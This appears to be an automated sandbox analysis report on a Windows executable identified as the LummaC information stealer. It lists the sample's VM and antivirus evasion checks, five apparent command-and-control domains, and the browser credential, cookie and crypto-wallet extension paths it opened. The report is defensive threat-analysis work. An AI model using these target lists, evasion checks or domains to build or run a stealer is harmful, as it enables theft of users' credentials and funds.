                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B01106 push eax; ret 0_3_00B0110D
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0DE71 push eax; ret 0_3_00B0DE79
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0DE71 push eax; ret 0_3_00B0DE79
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0DE71 push eax; ret 0_3_00B0DE79
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B09712 push ecx; retf 0_3_00B09738
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B09712 push ecx; retf 0_3_00B09738
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B09712 push ecx; retf 0_3_00B09738
                Source: C:\Users\user\Desktop\ardware-v1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\ardware-v1.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exe TID: 1988Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exe TID: 5320Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: ardware-v1.exe, 00000000.00000003.3049146152.00000000035A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: ardware-v1.exe, ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3121039700.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3121763569.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3152923303.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2934962608.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219399245.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220218856.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: ardware-v1.exe, 00000000.00000003.3049146152.00000000035A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: ardware-v1.exe, 00000000.00000003.3219399245.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220131253.0000000000A4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\ardware-v1.exeProcess information queried: ProcessInformationJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: ardware-v1.exe, 00000000.00000002.3219801106.00000000006F6000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: debonairnukk.xyz
                Source: ardware-v1.exe, 00000000.00000002.3219801106.00000000006F6000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: diffuculttan.xyz
                Source: ardware-v1.exe, 00000000.00000002.3219801106.00000000006F6000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: effecterectz.xyz
                Source: ardware-v1.exe, 00000000.00000002.3219801106.00000000006F6000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: deafeninggeh.biz
                Source: ardware-v1.exe, 00000000.00000002.3219801106.00000000006F6000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: immureprech.biz
                Source: C:\Users\user\Desktop\ardware-v1.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: ardware-v1.exe, ardware-v1.exe, 00000000.00000003.3152887612.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\ardware-v1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ardware-v1.exe PID: 1972, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: ardware-v1.exeString found in binary or memory: Wallets/Electrum
                Source: ardware-v1.exeString found in binary or memory: Wallets/ElectronCash
                Source: ardware-v1.exeString found in binary or memory: window-state.json
                Source: ardware-v1.exeString found in binary or memory: Wallets/JAXX New Version
                Source: ardware-v1.exe, 00000000.00000003.3121039700.0000000000A7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                Source: ardware-v1.exeString found in binary or memory: Wallets/Ethereum
                Source: ardware-v1.exe, 00000000.00000003.3120968564.0000000000B03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: ardware-v1.exe, 00000000.00000003.3120968564.0000000000B03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
